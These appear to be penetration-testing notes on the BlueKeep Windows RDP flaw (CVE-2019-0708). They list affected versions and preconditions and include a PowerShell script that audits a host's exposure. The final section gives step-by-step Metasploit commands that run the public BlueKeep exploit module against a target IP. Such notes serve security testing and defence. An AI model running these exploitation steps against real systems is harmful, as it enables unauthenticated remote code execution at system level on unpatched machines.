BlueKeep (CVE-2019-0708)
BlueKeep is the name given to an RDP vulnerability in Windows that could potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system.
The flaw gives attackers access to a chunk of kernel memory, which lets them execute code remotely at the system level without authentication.
The BlueKeep vulnerability affects multiple Windows versions: XP, Vista, Windows 7, Windows Server 2008 and 2008 R2.
RDP needs to be enabled on the target system.
If NLA (Network Level Authentication) is enabled, this exploit will likely fail.
Various illegitimate PoCs are in circulation that could be malicious in nature. Therefore, it is recommended to only use verified exploits.
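The two preconditions above (RDP enabled, NLA not required) can be audited locally on a Windows host. The script below is an added example, not part of the original notes; the function names are hypothetical, the registry values are the standard Terminal Services settings, and patch status is not checked.

```powershell
# Added example: local audit of the preconditions named in the notes above.
# Written to stay compatible with PowerShell 2.0 (Windows 7 / Server 2008 R2).

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or the value does not exist
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($item) { return $item.$Name }
    return $null
}

function Test-BlueKeepPreconditions {
    $ts     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdpTcp = "$ts\WinStations\RDP-Tcp"
    $policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'

    # Group Policy values, when present, override the local settings
    $deny = Get-RegValue $policy 'fDenyTSConnections'
    if ($null -eq $deny) { $deny = Get-RegValue $ts 'fDenyTSConnections' }
    $nla = Get-RegValue $policy 'UserAuthentication'
    if ($null -eq $nla) { $nla = Get-RegValue $rdpTcp 'UserAuthentication' }
    $port = Get-RegValue $rdpTcp 'PortNumber'

    # A missing value is reported as False (RDP off / NLA not required)
    $rdpEnabled  = ($deny -eq 0)   # 0 = remote connections allowed
    $nlaRequired = ($nla -eq 1)    # 1 = authenticate before a session is created

    # Version families for the releases listed in these notes:
    # 5.1 = XP, 6.0 = Vista / Server 2008, 6.1 = Windows 7 / Server 2008 R2
    $v = [Environment]::OSVersion.Version
    $family = '{0}.{1}' -f $v.Major, $v.Minor
    $listed = @('5.1', '6.0', '6.1') -contains $family

    New-Object PSObject -Property @{
        Computer    = $env:COMPUTERNAME
        OSVersion   = $v.ToString()
        ListedOS    = $listed
        RdpEnabled  = $rdpEnabled
        RdpPort     = $port
        NlaRequired = $nlaRequired
        # True only when all three conditions from the notes hold
        NeedsReview = ($listed -and $rdpEnabled -and -not $nlaRequired)
    }
}

Test-BlueKeepPreconditions | Format-List
```

A host reporting NeedsReview as True should have NLA enforced or RDP disabled until its patch level is confirmed.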
Exploitation
Metasploit Exploitation
nmap -p3389 TARGET_IP
msfconsole -q
# This module only works on x64 versions
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS TARGET_IP
# Check payload options and adjust them accordingly
# If the exploit fails, list the available targets
show targets
# Select the target that matches the system
set target TARGET_NUMBER
exploit